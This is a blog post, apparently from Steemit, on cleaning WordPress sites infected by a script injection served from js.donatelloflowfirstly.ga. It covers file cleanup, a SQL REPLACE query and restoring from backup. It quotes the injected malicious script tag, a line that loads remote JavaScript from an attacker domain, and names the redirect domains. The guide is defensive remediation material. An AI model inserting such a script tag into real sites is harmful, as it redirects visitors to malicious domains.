How to Clean “js.donatelloflowfirstly.ga” Virus from Wordpress Sites

in #palnet4 years ago

donatelloflowfirstly.ga.jpg

New virus from the domain “ js.donatelloflowfirstly.ga “ is infecting many WordPress sites these days by injecting a line of JS code into the wordpress themes/plugins files and all posts and pages via sql command. The virus will redirect the sites to malicious domains like blackwaterforllows.ga , donatelloflowfirstly.ga , and blackwaterforllows.ga .

<script src=’https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type=’text/javascript’></script>

##How it remove it

This article was posted athttps://www.waikey.com/vps-tutorials/remove-js-donatelloflowfirstly-ga/

1: First Step

Very important. De-active CDN function first, and you need to turn offer Memcached / Redis if you are running these with VPS hosting.

2: Basic Step

  1. Check your root /public_html folder via Cpanel, or you can manager files with other panel if your sites running on VPS. Find and delete the new generated malware file. Most of time the file named with _a or _t , there is no suffix.
  2. Delete all Cached Files. Many wordpress sites usie cache plugins, just delete them since many cached files been injected too. Normally the cached files are located in folder wp-content .

js.donatelloflowfirstly.ga.png

3: Clean DataBase
Login Phpmyadmin via Cpanel or other panels, click on the site database, and run the following SQL command:

UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src=’https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type=’text/javascript’></script>”, ‘’));

4: Clean Core Files

There are many ways to clean your wordpress files. Here is my way:

  1. Zip all the site files and download the zip file to desktop.
  2. Unzip the files to the folder, “ waikey “ as an example.
  3. Located to the folder wp-content / plugins and /themes , and delete all plugins and themes. Then replace with the clean plugins into the folder.
  4. Now run the VSCode editor, you can download it at: https://code.visualstudio.com/ and install it.
  5. Open the waikey (example) folder via VSCode, then click Edit > Search in the files to search the keywords: donatelloflowfirstly . There should be only a few files been found since we have deleted all Cached Files and replaced all Themes and Plugins. Edit those files if you know how to or just replace them with clean files.
  6. For now, all files shoud be clean. Delete your whole site, and upload this clean backup to the site folder. Your site should be OK now.

5: Backup Your Site
Backup your clean site files and database, and keep backup everytime you post a new article or some other works since people still don’t know where is the backdoor and how to fix it.

Conclusion

As I said, people still don’t know where is the backdoor and how it generate/download the malware file, but most probably it’s from Nulled Plugin & Themes. So it’s better to remove all themes and plugin you have downloaded from warez sites and buy the official version if you need them. AND REMEBER to backup your site and database.

Coin Marketplace

STEEM 0.27
TRX 0.13
JST 0.032
BTC 61451.22
ETH 2929.56
USDT 1.00
SBD 3.65